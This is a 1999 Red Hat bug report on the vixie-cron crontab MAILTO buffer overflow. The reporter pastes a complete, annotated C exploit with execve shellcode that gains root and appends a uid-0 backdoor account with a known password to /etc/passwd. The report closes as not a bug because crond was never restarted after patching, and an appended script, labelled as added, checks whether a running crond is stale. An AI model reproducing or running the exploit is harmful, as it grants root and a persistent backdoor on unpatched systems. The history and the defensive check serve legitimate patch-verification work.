Bug 5819

Summary: vixie cron exploit still works !
Product: [Retired] Red Hat Linux
Reporter: shivan
Component: vixie-cron
Assignee: Crutcher Dunnavant <crutcher>
Status: CLOSED NOTABUG
Severity: medium
Priority: high
Version: 6.0
Keywords: Security
Hardware: All
OS: Linux
URL: http://www.life.be
Doc Type: Bug Fix
Last Closed: 2001-04-10 22:05:26 UTC

Description shivan 1999-10-11 05:43:13 UTC
'lo ..

I tried the vixie cron exploit which came out on 08/25/1999,
and it still works.

Normally this exploit should have been fixed with
vixie-cron-3.0.1-37; I installed up to 3.0.1-39, and the
buffer overflow still works. I tried this on several
machines (all RH 6.0) with different kernels. (This also
works on alpha.)

Please inform me ASAP about the progress on this bug
(original exploit pasted below).

Kind Regards,
Dimitri Avgoustakis
UNIX Administrator ..
LIFE - The Linux Company

exploit located on bugtraq :
"http://www.securityfocus.com/data/vulnerabilities/exploits/crontab_exploit.c"

/*
        vixie-crontab-3.0.1 cron_popen() exploit by Akke - 30-8-99
                        Akke <c4c4>


        how to compile ?
                gcc crontab_exploit.c -o crontab_exploit

        how to use ?
                ./crontab_exploit
                crontab ./CrOn
                wait 1 minute
                crontab -r
                su -l cronexpl (password = exploited) (this is root account)

        Greets to: bugtraq
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Linux/x86 execve() shellcode (jmp/call/pop style). The path it
   executes is the "/tmp/ce" helper script created below. */
char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/tmp/ce";

#define max_buf_len 1000
#define CronFile         "CrOn"            /* crontab written in the cwd */
#define RootScript       "/tmp/cron_root"  /* runs with crond's privileges */
#define CronEchoScript   "/tmp/cron_echo"  /* the (harmless) scheduled job */
#define chmod_bin        "/bin/chmod"

int main()
{
        char crontab_file_string[max_buf_len];
        char temp[max_buf_len];
        FILE *fp;
        int i;

        /* Padding that overruns the fixed-size buffer in crond's cron_popen()
           when it processes the MAILTO variable, followed by the shellcode. */
        strcpy(temp,
        "T h i s _ i s _ a _ s i m p l e _ e x p l o i t _ w r i t t e n _ b y _ A K K E _ "
        "T h i s _ i s _ a _ s i m p l e _ e x p l o i t _ w r i t t e n _ b y _ A K K E _ "
        "_ _ _ _ _ _ _ _ _ _ _ _ _ _ ");
        /* original used sprintf(temp,"%s%s",temp,shellcode), which passes the
           destination as a source argument; strcat has the intended effect */
        strcat(temp,shellcode);

        /* Crontab contents: the oversized MAILTO line, then a job whose minute
           field is "0,1,...,59" so it fires every minute. Its output makes
           crond try to mail the result, which is when MAILTO is handled. */
        sprintf(crontab_file_string,"MAILTO=%s\n",temp);
        strcat(crontab_file_string,"0");
        for (i=1;i<60;i++) {
                sprintf(temp,",%d",i);
                strcat(crontab_file_string,temp);
        }
        sprintf(temp," * * * * %s\n",CronEchoScript);
        strcat(crontab_file_string,temp);

        if ((fp = fopen(CronFile,"w+")) != NULL) {
                fprintf(fp,"%s",crontab_file_string);
                fclose(fp);
        }

        /* The scheduled job: any output at all is enough to trigger mailing. */
        if ((fp = fopen(CronEchoScript,"w+")) != NULL) {
                fprintf(fp,"#!/bin/sh\necho Wrong window!");
                fclose(fp);
                sprintf(temp,"%s 777 %s",chmod_bin,CronEchoScript);
                system(temp);
        }

        /* Payload executed as root: append a uid 0 account (password
           "exploited") to /etc/passwd and remove the helper files. */
        if ((fp = fopen(RootScript,"w+")) != NULL) {
                #define login "cronexpl"
                #define passw "1T8uqGnJZ0OsQ" /* "exploited" */
                fprintf(fp,"#!/bin/sh\necho %s:%s:0:0::/root:/bin/bash >> /etc/passwd\nrm %s %s %s",
                        login,passw,CronEchoScript,"/tmp/ce",RootScript);
                fclose(fp);
                sprintf(temp,"%s 777 %s",chmod_bin,RootScript);
                system(temp);
        }

        /* /tmp/ce is the program the shellcode execve()s; it runs RootScript. */
        if ((fp = fopen("/tmp/ce","w+")) != NULL) {
                fprintf(fp,"#!/bin/sh\n%s\n",RootScript);
                fclose(fp);
                sprintf(temp,"%s 777 %s",chmod_bin,"/tmp/ce");
                system(temp);
        }
        exit(0);
}

Comment 1 shivan 1999-10-11 06:24:59 UTC
RHSA-1999:030-01: vixie-cron crond MAILTO

Comment 2 shivan 1999-10-11 07:10:59 UTC
Dear Red Hat,

I'm pleased to tell you I'm stupid ..
I forgot to stop/start crond after upgrading ..

My apologies ;)
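The resolution above is the practical lesson of this report: the fixed vixie-cron package was on disk, but the crond process that was still running had been started from the old binary and so still carried the MAILTO overflow. The following script is an added example, not part of the bug report or of the vixie-cron package, for checking whether a running crond predates the package that was installed to fix it. It assumes an rpm-based system with GNU ps and date, a package named vixie-cron and a process named crond; the live probe is a separate function so the decision logic can be exercised with constructed timestamps.

```shell
#!/bin/sh
# Added example (not from the bug report): is the crond in memory older than
# the vixie-cron package on disk?  Timestamps are seconds since the epoch.

# verdict <package_install_epoch> <process_start_epoch>
#   prints "stale" when the daemon started before the package was installed
#   (fix on disk, old code in memory), "current" otherwise, and "unknown"
#   when either value is missing.
verdict() {
    install_ts=$1
    start_ts=$2
    if [ -z "$install_ts" ] || [ -z "$start_ts" ]; then
        echo unknown
        return 0
    fi
    if [ "$start_ts" -lt "$install_ts" ]; then
        echo stale
    else
        echo current
    fi
}

# exe_replaced <readlink_output>
#   On Linux, /proc/PID/exe of a process whose executable was replaced or
#   removed on disk reads as "/path/to/binary (deleted)".  Succeeds if so.
exe_replaced() {
    case "$1" in
        *" (deleted)") return 0 ;;
        *) return 1 ;;
    esac
}

# Live probe (assumptions: rpm, pidof, GNU ps and date, /proc available).
# Run by hand as root; exits non-zero when crond should be restarted.
check_crond_live() {
    pkg=${1:-vixie-cron}
    pid=$(pidof crond 2>/dev/null | cut -d' ' -f1)
    [ -n "$pid" ] || { echo "crond not running"; return 2; }
    install_ts=$(rpm -q --qf '%{INSTALLTIME}\n' "$pkg" 2>/dev/null | tail -n1)
    start_ts=$(date -d "$(ps -o lstart= -p "$pid")" +%s 2>/dev/null)
    link=$(readlink "/proc/$pid/exe" 2>/dev/null)
    state=$(verdict "$install_ts" "$start_ts")
    if exe_replaced "$link"; then
        state=stale
    fi
    echo "crond pid $pid: $state (package installed $install_ts, daemon started $start_ts)"
    [ "$state" != stale ]
}
```

The /proc/PID/exe check is the more reliable of the two signals: rpm replaces the binary with a new inode, so a daemon still running the old code shows the "(deleted)" suffix regardless of clock skew or a reinstall of the same version. The timestamp comparison catches the case where the new package was installed but the daemon was started from the old binary before the upgrade, which is exactly what happened in Comment 2.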